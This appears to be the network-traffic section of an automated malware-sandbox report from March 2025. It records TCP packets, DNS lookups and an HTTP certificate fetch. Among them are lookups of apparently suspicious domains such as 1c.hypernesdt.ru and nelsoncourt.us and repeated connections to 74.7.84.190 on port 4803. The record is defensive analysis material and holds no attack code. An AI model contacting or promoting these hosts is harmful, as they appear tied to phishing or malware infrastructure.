                                                                          Mar 4, 2025 18:26:39.394923925 CET49706443192.168.2.620.190.160.64
                                                                          Mar 4, 2025 18:26:39.400187016 CET4434970620.190.160.64192.168.2.6
                                                                          Mar 4, 2025 18:26:39.400274992 CET49706443192.168.2.620.190.160.64
                                                                          Mar 4, 2025 18:26:43.445441008 CET44350042172.217.18.4192.168.2.6
                                                                          Mar 4, 2025 18:26:43.445537090 CET44350042172.217.18.4192.168.2.6
                                                                          Mar 4, 2025 18:26:43.445745945 CET50042443192.168.2.6172.217.18.4
                                                                          Mar 4, 2025 18:26:44.487710953 CET50042443192.168.2.6172.217.18.4
                                                                          Mar 4, 2025 18:26:44.487786055 CET44350042172.217.18.4192.168.2.6
                                                                          Mar 4, 2025 18:26:45.226020098 CET48035003974.7.84.190192.168.2.6
                                                                          Mar 4, 2025 18:26:45.226118088 CET500394803192.168.2.674.7.84.190
                                                                          Mar 4, 2025 18:26:45.226232052 CET500394803192.168.2.674.7.84.190
                                                                          Mar 4, 2025 18:26:45.226574898 CET500384803192.168.2.674.7.84.190
                                                                          Mar 4, 2025 18:26:45.231440067 CET48035003974.7.84.190192.168.2.6
                                                                          Mar 4, 2025 18:26:45.231606960 CET48035003874.7.84.190192.168.2.6
                                                                          Mar 4, 2025 18:26:45.241601944 CET48035003874.7.84.190192.168.2.6
                                                                          Mar 4, 2025 18:26:45.241698027 CET500384803192.168.2.674.7.84.190
                                                                          Mar 4, 2025 18:26:45.241915941 CET500384803192.168.2.674.7.84.190
                                                                          Mar 4, 2025 18:26:45.242525101 CET500434803192.168.2.674.7.84.190
                                                                          Mar 4, 2025 18:26:45.246941090 CET48035003874.7.84.190192.168.2.6
                                                                          Mar 4, 2025 18:26:45.247844934 CET48035004374.7.84.190192.168.2.6
                                                                          Mar 4, 2025 18:26:45.247939110 CET500434803192.168.2.674.7.84.190
                                                                          Mar 4, 2025 18:26:45.248132944 CET500434803192.168.2.674.7.84.190
                                                                          Mar 4, 2025 18:26:45.253237963 CET48035004374.7.84.190192.168.2.6
                                                                          Mar 4, 2025 18:27:05.640877962 CET50045443192.168.2.640.115.3.253
                                                                          Mar 4, 2025 18:27:05.640939951 CET4435004540.115.3.253192.168.2.6
                                                                          Mar 4, 2025 18:27:05.641041994 CET50045443192.168.2.640.115.3.253
                                                                          Mar 4, 2025 18:27:05.641587019 CET50045443192.168.2.640.115.3.253
                                                                          Mar 4, 2025 18:27:05.641604900 CET4435004540.115.3.253192.168.2.6
                                                                          Mar 4, 2025 18:27:06.473661900 CET4435004540.115.3.253192.168.2.6
                                                                          Mar 4, 2025 18:27:06.473942995 CET50045443192.168.2.640.115.3.253
                                                                          Mar 4, 2025 18:27:06.476459026 CET50045443192.168.2.640.115.3.253
                                                                          Mar 4, 2025 18:27:06.476485968 CET4435004540.115.3.253192.168.2.6
                                                                          Mar 4, 2025 18:27:06.476840019 CET4435004540.115.3.253192.168.2.6
                                                                          Mar 4, 2025 18:27:06.478996992 CET50045443192.168.2.640.115.3.253
                                                                          Mar 4, 2025 18:27:06.479053974 CET50045443192.168.2.640.115.3.253
                                                                          Mar 4, 2025 18:27:06.479067087 CET4435004540.115.3.253192.168.2.6
                                                                          Mar 4, 2025 18:27:06.479182005 CET50045443192.168.2.640.115.3.253
                                                                          Mar 4, 2025 18:27:06.524322987 CET4435004540.115.3.253192.168.2.6
                                                                          Mar 4, 2025 18:27:06.618529081 CET48035004374.7.84.190192.168.2.6
                                                                          Mar 4, 2025 18:27:06.618760109 CET500434803192.168.2.674.7.84.190
                                                                          Mar 4, 2025 18:27:06.619028091 CET500434803192.168.2.674.7.84.190
                                                                          Mar 4, 2025 18:27:06.625623941 CET48035004374.7.84.190192.168.2.6
                                                                          Mar 4, 2025 18:27:06.697335958 CET4435004540.115.3.253192.168.2.6
                                                                          Mar 4, 2025 18:27:06.698012114 CET50045443192.168.2.640.115.3.253
                                                                          Mar 4, 2025 18:27:06.698038101 CET4435004540.115.3.253192.168.2.6
                                                                          Mar 4, 2025 18:27:06.698064089 CET50045443192.168.2.640.115.3.253
                                                                          Mar 4, 2025 18:27:06.698101997 CET50045443192.168.2.640.115.3.253
                                                                          Mar 4, 2025 18:27:32.708237886 CET50046443192.168.2.6172.217.18.4
                                                                          Mar 4, 2025 18:27:32.708318949 CET44350046172.217.18.4192.168.2.6
                                                                          Mar 4, 2025 18:27:32.708416939 CET50046443192.168.2.6172.217.18.4
                                                                          Mar 4, 2025 18:27:32.709364891 CET50046443192.168.2.6172.217.18.4
                                                                          Mar 4, 2025 18:27:32.709398985 CET44350046172.217.18.4192.168.2.6
                                                                          Mar 4, 2025 18:27:33.555737972 CET44350046172.217.18.4192.168.2.6
                                                                          Mar 4, 2025 18:27:33.556252003 CET50046443192.168.2.6172.217.18.4
                                                                          Mar 4, 2025 18:27:33.556276083 CET44350046172.217.18.4192.168.2.6
                                                                          Mar 4, 2025 18:27:33.557472944 CET44350046172.217.18.4192.168.2.6
                                                                          Mar 4, 2025 18:27:33.557970047 CET50046443192.168.2.6172.217.18.4
                                                                          Mar 4, 2025 18:27:33.558163881 CET44350046172.217.18.4192.168.2.6
                                                                          Mar 4, 2025 18:27:33.610889912 CET50046443192.168.2.6172.217.18.4
                                                                          Mar 4, 2025 18:27:36.644032955 CET500474803192.168.2.674.7.84.190
                                                                          Mar 4, 2025 18:27:36.644203901 CET500484803192.168.2.674.7.84.190
                                                                          Mar 4, 2025 18:27:36.649188995 CET48035004774.7.84.190192.168.2.6
                                                                          Mar 4, 2025 18:27:36.649275064 CET48035004874.7.84.190192.168.2.6
                                                                          Mar 4, 2025 18:27:36.649296045 CET500474803192.168.2.674.7.84.190
                                                                          Mar 4, 2025 18:27:36.649348974 CET500484803192.168.2.674.7.84.190
                                                                          Mar 4, 2025 18:27:36.652972937 CET500484803192.168.2.674.7.84.190
                                                                          Mar 4, 2025 18:27:36.658791065 CET48035004874.7.84.190192.168.2.6
                                                                          Mar 4, 2025 18:27:43.477807045 CET44350046172.217.18.4192.168.2.6
                                                                          Mar 4, 2025 18:27:43.477963924 CET44350046172.217.18.4192.168.2.6
                                                                          Mar 4, 2025 18:27:43.478025913 CET50046443192.168.2.6172.217.18.4
                                                                          Mar 4, 2025 18:27:44.489275932 CET50046443192.168.2.6172.217.18.4
                                                                          Mar 4, 2025 18:27:44.489310026 CET44350046172.217.18.4192.168.2.6
                                                                          Mar 4, 2025 18:27:58.024636030 CET48035004874.7.84.190192.168.2.6
                                                                          Mar 4, 2025 18:27:58.024707079 CET500484803192.168.2.674.7.84.190
                                                                          Mar 4, 2025 18:27:58.024807930 CET500484803192.168.2.674.7.84.190
                                                                          Mar 4, 2025 18:27:58.025156021 CET500474803192.168.2.674.7.84.190
                                                                          Mar 4, 2025 18:27:58.028327942 CET48035004774.7.84.190192.168.2.6
                                                                          Mar 4, 2025 18:27:58.028387070 CET500474803192.168.2.674.7.84.190
                                                                          Mar 4, 2025 18:27:58.028425932 CET500474803192.168.2.674.7.84.190
                                                                          Mar 4, 2025 18:27:58.029041052 CET500494803192.168.2.674.7.84.190
                                                                          Mar 4, 2025 18:27:58.029791117 CET48035004874.7.84.190192.168.2.6
                                                                          Mar 4, 2025 18:27:58.030190945 CET48035004774.7.84.190192.168.2.6
                                                                          Mar 4, 2025 18:27:58.033428907 CET48035004774.7.84.190192.168.2.6
                                                                          Mar 4, 2025 18:27:58.033438921 CET48035004774.7.84.190192.168.2.6
                                                                          Mar 4, 2025 18:27:58.035126925 CET48035004974.7.84.190192.168.2.6
                                                                          Mar 4, 2025 18:27:58.035202026 CET500494803192.168.2.674.7.84.190
                                                                          Mar 4, 2025 18:27:58.035471916 CET500494803192.168.2.674.7.84.190
                                                                          Mar 4, 2025 18:27:58.040433884 CET48035004974.7.84.190192.168.2.6
                                                                          Mar 4, 2025 18:28:15.777395010 CET50050443192.168.2.640.115.3.253
                                                                          Mar 4, 2025 18:28:15.777446032 CET4435005040.115.3.253192.168.2.6
                                                                          Mar 4, 2025 18:28:15.777751923 CET50050443192.168.2.640.115.3.253
                                                                          Mar 4, 2025 18:28:15.778386116 CET50050443192.168.2.640.115.3.253
                                                                          Mar 4, 2025 18:28:15.778403997 CET4435005040.115.3.253192.168.2.6
                                                                          Mar 4, 2025 18:28:16.604110003 CET4435005040.115.3.253192.168.2.6
                                                                          Mar 4, 2025 18:28:16.604203939 CET50050443192.168.2.640.115.3.253
                                                                          Mar 4, 2025 18:28:16.608331919 CET50050443192.168.2.640.115.3.253
                                                                          Mar 4, 2025 18:28:16.608360052 CET4435005040.115.3.253192.168.2.6
                                                                          Mar 4, 2025 18:28:16.608555079 CET4435005040.115.3.253192.168.2.6
                                                                          Mar 4, 2025 18:28:16.612344980 CET50050443192.168.2.640.115.3.253
                                                                          Mar 4, 2025 18:28:16.612344980 CET50050443192.168.2.640.115.3.253
                                                                          Mar 4, 2025 18:28:16.612344980 CET50050443192.168.2.640.115.3.253
                                                                          Mar 4, 2025 18:28:16.612391949 CET4435005040.115.3.253192.168.2.6
                                                                          Mar 4, 2025 18:28:16.799278975 CET4435005040.115.3.253192.168.2.6
                                                                          Mar 4, 2025 18:28:16.799480915 CET4435005040.115.3.253192.168.2.6
                                                                          Mar 4, 2025 18:28:16.799583912 CET50050443192.168.2.640.115.3.253
                                                                          Mar 4, 2025 18:28:16.799710035 CET50050443192.168.2.640.115.3.253
                                                                          Mar 4, 2025 18:28:16.799736977 CET4435005040.115.3.253192.168.2.6
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Mar 4, 2025 18:25:07.534518003 CET5975853192.168.2.61.1.1.1
                                                                          Mar 4, 2025 18:25:07.534719944 CET5916453192.168.2.61.1.1.1
                                                                          Mar 4, 2025 18:25:07.592133045 CET53591641.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:25:07.616983891 CET53529311.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:25:07.644395113 CET53597581.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:25:08.801192999 CET53532811.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:25:08.833013058 CET6332653192.168.2.61.1.1.1
                                                                          Mar 4, 2025 18:25:08.833144903 CET6094353192.168.2.61.1.1.1
                                                                          Mar 4, 2025 18:25:08.846394062 CET53633261.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:25:08.930938005 CET53609431.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:25:10.127599955 CET6245353192.168.2.61.1.1.1
                                                                          Mar 4, 2025 18:25:10.127600908 CET5678653192.168.2.61.1.1.1
                                                                          Mar 4, 2025 18:25:10.127840042 CET4932653192.168.2.61.1.1.1
                                                                          Mar 4, 2025 18:25:10.128355026 CET6098653192.168.2.61.1.1.1
                                                                          Mar 4, 2025 18:25:10.128355026 CET4917753192.168.2.61.1.1.1
                                                                          Mar 4, 2025 18:25:10.128859043 CET5708453192.168.2.61.1.1.1
                                                                          Mar 4, 2025 18:25:10.134970903 CET53567861.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:25:10.135188103 CET53493261.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:25:10.135411024 CET53624531.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:25:10.136099100 CET53570841.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:25:10.136435032 CET53609861.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:25:10.136738062 CET53491771.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:25:11.074007034 CET6314353192.168.2.61.1.1.1
                                                                          Mar 4, 2025 18:25:11.074270010 CET5297453192.168.2.61.1.1.1
                                                                          Mar 4, 2025 18:25:11.076910019 CET5255953192.168.2.61.1.1.1
                                                                          Mar 4, 2025 18:25:11.077091932 CET6525353192.168.2.61.1.1.1
                                                                          Mar 4, 2025 18:25:11.081386089 CET53529741.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:25:11.081463099 CET53631431.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:25:11.084291935 CET53525591.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:25:11.084316015 CET53652531.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:25:11.439289093 CET4970453192.168.2.61.1.1.1
                                                                          Mar 4, 2025 18:25:11.439475060 CET5916753192.168.2.61.1.1.1
                                                                          Mar 4, 2025 18:25:11.446566105 CET53591671.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:25:11.447104931 CET53497041.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:25:11.607482910 CET6352253192.168.2.61.1.1.1
                                                                          Mar 4, 2025 18:25:11.607482910 CET5186253192.168.2.61.1.1.1
                                                                          Mar 4, 2025 18:25:11.614584923 CET53635221.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:25:11.614763021 CET53518621.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:25:11.654315948 CET5859653192.168.2.61.1.1.1
                                                                          Mar 4, 2025 18:25:11.654767036 CET5313453192.168.2.61.1.1.1
                                                                          Mar 4, 2025 18:25:11.663892984 CET53531341.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:25:11.666951895 CET53585961.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:25:12.353844881 CET5071853192.168.2.61.1.1.1
                                                                          Mar 4, 2025 18:25:12.354047060 CET5712953192.168.2.61.1.1.1
                                                                          Mar 4, 2025 18:25:12.362557888 CET53507181.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:25:12.402153969 CET53571291.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:25:15.544877052 CET6325753192.168.2.61.1.1.1
                                                                          Mar 4, 2025 18:25:15.552647114 CET53632571.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:25:25.823805094 CET53573241.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:25:25.824806929 CET53555531.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:25:28.076179028 CET5202253192.168.2.61.1.1.1
                                                                          Mar 4, 2025 18:25:28.076394081 CET4934853192.168.2.61.1.1.1
                                                                          Mar 4, 2025 18:25:28.082071066 CET53563181.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:25:28.089371920 CET53493481.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:25:28.127690077 CET53520221.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:25:28.341202021 CET53587171.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:25:28.365283012 CET5053553192.168.2.61.1.1.1
                                                                          Mar 4, 2025 18:25:28.365462065 CET5591053192.168.2.61.1.1.1
                                                                          Mar 4, 2025 18:25:28.473913908 CET53505351.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:25:28.571103096 CET53559101.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:25:29.748047113 CET53627811.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:25:32.579647064 CET5831553192.168.2.61.1.1.1
                                                                          Mar 4, 2025 18:25:32.579822063 CET6106153192.168.2.61.1.1.1
                                                                          Mar 4, 2025 18:25:32.586735010 CET53583151.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:25:32.587425947 CET53610611.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:25:34.838893890 CET53632111.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:25:46.823602915 CET53634541.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:26:05.651454926 CET53569631.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:26:27.793309927 CET53534231.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:26:28.619663954 CET53505591.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:26:58.871867895 CET53557301.1.1.1192.168.2.6
                                                                          Mar 4, 2025 18:27:45.026597977 CET53524391.1.1.1192.168.2.6
                                                                          TimestampSource IPDest IPChecksumCodeType
                                                                          Mar 4, 2025 18:25:08.931004047 CET192.168.2.61.1.1.1c27c(Port unreachable)Destination Unreachable
                                                                          Mar 4, 2025 18:25:12.402235031 CET192.168.2.61.1.1.1c276(Port unreachable)Destination Unreachable
                                                                          Mar 4, 2025 18:25:28.571250916 CET192.168.2.61.1.1.1c22d(Port unreachable)Destination Unreachable
                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Mar 4, 2025 18:25:07.534518003 CET192.168.2.61.1.1.10xfc46Standard query (0)ronl.orgA (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:07.534719944 CET192.168.2.61.1.1.10x37dStandard query (0)ronl.org65IN (0x0001)false
                                                                          Mar 4, 2025 18:25:08.833013058 CET192.168.2.61.1.1.10x30bStandard query (0)1c.hypernesdt.ruA (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:08.833144903 CET192.168.2.61.1.1.10x2bb0Standard query (0)1c.hypernesdt.ru65IN (0x0001)false
                                                                          Mar 4, 2025 18:25:10.127599955 CET192.168.2.61.1.1.10xd847Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:10.127600908 CET192.168.2.61.1.1.10xeef7Standard query (0)code.jquery.com65IN (0x0001)false
                                                                          Mar 4, 2025 18:25:10.127840042 CET192.168.2.61.1.1.10x504bStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:10.128355026 CET192.168.2.61.1.1.10x8be3Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:10.128355026 CET192.168.2.61.1.1.10xab70Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                          Mar 4, 2025 18:25:10.128859043 CET192.168.2.61.1.1.10x8c03Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                          Mar 4, 2025 18:25:11.074007034 CET192.168.2.61.1.1.10x6fb6Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:11.074270010 CET192.168.2.61.1.1.10x894fStandard query (0)code.jquery.com65IN (0x0001)false
                                                                          Mar 4, 2025 18:25:11.076910019 CET192.168.2.61.1.1.10xe5cbStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:11.077091932 CET192.168.2.61.1.1.10xef12Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                          Mar 4, 2025 18:25:11.439289093 CET192.168.2.61.1.1.10x9f80Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:11.439475060 CET192.168.2.61.1.1.10x9143Standard query (0)www.google.com65IN (0x0001)false
                                                                          Mar 4, 2025 18:25:11.607482910 CET192.168.2.61.1.1.10xf33aStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:11.607482910 CET192.168.2.61.1.1.10xac36Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                          Mar 4, 2025 18:25:11.654315948 CET192.168.2.61.1.1.10x7cb3Standard query (0)developers.cloudflare.comA (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:11.654767036 CET192.168.2.61.1.1.10x11f8Standard query (0)developers.cloudflare.com65IN (0x0001)false
                                                                          Mar 4, 2025 18:25:12.353844881 CET192.168.2.61.1.1.10xbe5cStandard query (0)developers.cloudflare.comA (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:12.354047060 CET192.168.2.61.1.1.10xc3ceStandard query (0)developers.cloudflare.com65IN (0x0001)false
                                                                          Mar 4, 2025 18:25:15.544877052 CET192.168.2.61.1.1.10xc56fStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:28.076179028 CET192.168.2.61.1.1.10x2bdeStandard query (0)nelsoncourt.usA (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:28.076394081 CET192.168.2.61.1.1.10xb72eStandard query (0)nelsoncourt.us65IN (0x0001)false
                                                                          Mar 4, 2025 18:25:28.365283012 CET192.168.2.61.1.1.10x8042Standard query (0)nelsoncourt.usA (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:28.365462065 CET192.168.2.61.1.1.10xe99dStandard query (0)nelsoncourt.us65IN (0x0001)false
                                                                          Mar 4, 2025 18:25:32.579647064 CET192.168.2.61.1.1.10x248eStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:32.579822063 CET192.168.2.61.1.1.10x6076Standard query (0)www.google.com65IN (0x0001)false
                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Mar 4, 2025 18:25:07.644395113 CET1.1.1.1192.168.2.60xfc46No error (0)ronl.org185.191.197.92A (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:08.846394062 CET1.1.1.1192.168.2.60x30bNo error (0)1c.hypernesdt.ru188.114.96.3A (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:08.846394062 CET1.1.1.1192.168.2.60x30bNo error (0)1c.hypernesdt.ru188.114.97.3A (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:08.930938005 CET1.1.1.1192.168.2.60x2bb0No error (0)1c.hypernesdt.ru65IN (0x0001)false
                                                                          Mar 4, 2025 18:25:10.135188103 CET1.1.1.1192.168.2.60x504bNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:10.135188103 CET1.1.1.1192.168.2.60x504bNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:10.135411024 CET1.1.1.1192.168.2.60xd847No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:10.135411024 CET1.1.1.1192.168.2.60xd847No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:10.135411024 CET1.1.1.1192.168.2.60xd847No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:10.135411024 CET1.1.1.1192.168.2.60xd847No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:10.136099100 CET1.1.1.1192.168.2.60x8c03No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                          Mar 4, 2025 18:25:10.136435032 CET1.1.1.1192.168.2.60x8be3No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:10.136435032 CET1.1.1.1192.168.2.60x8be3No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:10.136738062 CET1.1.1.1192.168.2.60xab70No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                          Mar 4, 2025 18:25:11.081463099 CET1.1.1.1192.168.2.60x6fb6No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:11.081463099 CET1.1.1.1192.168.2.60x6fb6No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:11.081463099 CET1.1.1.1192.168.2.60x6fb6No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:11.081463099 CET1.1.1.1192.168.2.60x6fb6No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:11.084291935 CET1.1.1.1192.168.2.60xe5cbNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:11.084291935 CET1.1.1.1192.168.2.60xe5cbNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:11.084316015 CET1.1.1.1192.168.2.60xef12No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                          Mar 4, 2025 18:25:11.446566105 CET1.1.1.1192.168.2.60x9143No error (0)www.google.com65IN (0x0001)false
                                                                          Mar 4, 2025 18:25:11.447104931 CET1.1.1.1192.168.2.60x9f80No error (0)www.google.com172.217.16.196A (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:11.614584923 CET1.1.1.1192.168.2.60xf33aNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:11.614584923 CET1.1.1.1192.168.2.60xf33aNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:11.614763021 CET1.1.1.1192.168.2.60xac36No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                          Mar 4, 2025 18:25:11.663892984 CET1.1.1.1192.168.2.60x11f8No error (0)developers.cloudflare.com65IN (0x0001)false
                                                                          Mar 4, 2025 18:25:11.666951895 CET1.1.1.1192.168.2.60x7cb3No error (0)developers.cloudflare.com104.16.2.189A (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:11.666951895 CET1.1.1.1192.168.2.60x7cb3No error (0)developers.cloudflare.com104.16.3.189A (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:11.666951895 CET1.1.1.1192.168.2.60x7cb3No error (0)developers.cloudflare.com104.16.4.189A (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:11.666951895 CET1.1.1.1192.168.2.60x7cb3No error (0)developers.cloudflare.com104.16.5.189A (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:11.666951895 CET1.1.1.1192.168.2.60x7cb3No error (0)developers.cloudflare.com104.16.6.189A (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:12.362557888 CET1.1.1.1192.168.2.60xbe5cNo error (0)developers.cloudflare.com104.16.2.189A (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:12.362557888 CET1.1.1.1192.168.2.60xbe5cNo error (0)developers.cloudflare.com104.16.3.189A (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:12.362557888 CET1.1.1.1192.168.2.60xbe5cNo error (0)developers.cloudflare.com104.16.5.189A (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:12.362557888 CET1.1.1.1192.168.2.60xbe5cNo error (0)developers.cloudflare.com104.16.4.189A (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:12.362557888 CET1.1.1.1192.168.2.60xbe5cNo error (0)developers.cloudflare.com104.16.6.189A (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:12.402153969 CET1.1.1.1192.168.2.60xc3ceNo error (0)developers.cloudflare.com65IN (0x0001)false
                                                                          Mar 4, 2025 18:25:15.552647114 CET1.1.1.1192.168.2.60xc56fNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:15.552647114 CET1.1.1.1192.168.2.60xc56fNo error (0)crl.root-x1.letsencrypt.org.edgekey.nete8652.dscx.akamaiedge.netCNAME (Canonical name)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:15.552647114 CET1.1.1.1192.168.2.60xc56fNo error (0)e8652.dscx.akamaiedge.net92.123.17.129A (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:16.254719973 CET1.1.1.1192.168.2.60x1a04No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:16.254719973 CET1.1.1.1192.168.2.60x1a04No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:28.127690077 CET1.1.1.1192.168.2.60x2bdeNo error (0)nelsoncourt.us15.197.142.173A (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:28.127690077 CET1.1.1.1192.168.2.60x2bdeNo error (0)nelsoncourt.us3.33.152.147A (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:28.473913908 CET1.1.1.1192.168.2.60x8042No error (0)nelsoncourt.us15.197.142.173A (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:28.473913908 CET1.1.1.1192.168.2.60x8042No error (0)nelsoncourt.us3.33.152.147A (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:32.586735010 CET1.1.1.1192.168.2.60x248eNo error (0)www.google.com172.217.18.4A (IP address)IN (0x0001)false
                                                                          Mar 4, 2025 18:25:32.587425947 CET1.1.1.1192.168.2.60x6076No error (0)www.google.com65IN (0x0001)false
                                                                          • ronl.org
                                                                          • 1c.hypernesdt.ru
                                                                          • https:
                                                                            • code.jquery.com
                                                                            • cdnjs.cloudflare.com
                                                                            • challenges.cloudflare.com
                                                                            • developers.cloudflare.com
                                                                          • x1.i.lencr.org
                                                                          • nelsoncourt.us
                                                                          • 74.7.84.190:4803
                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.64976392.123.17.129805560C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 4, 2025 18:25:15.563416004 CET115OUTGET / HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept: */*
                                                                          User-Agent: Microsoft-CryptoAPI/10.0
                                                                          Host: x1.i.lencr.org
                                                                          Mar 4, 2025 18:25:16.215126038 CET1236INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Content-Type: application/pkix-cert
                                                                          Last-Modified: Fri, 04 Aug 2023 20:57:56 GMT
                                                                          ETag: "64cd6654-56f"
                                                                          Content-Disposition: attachment; filename="ISRG Root X1.der"
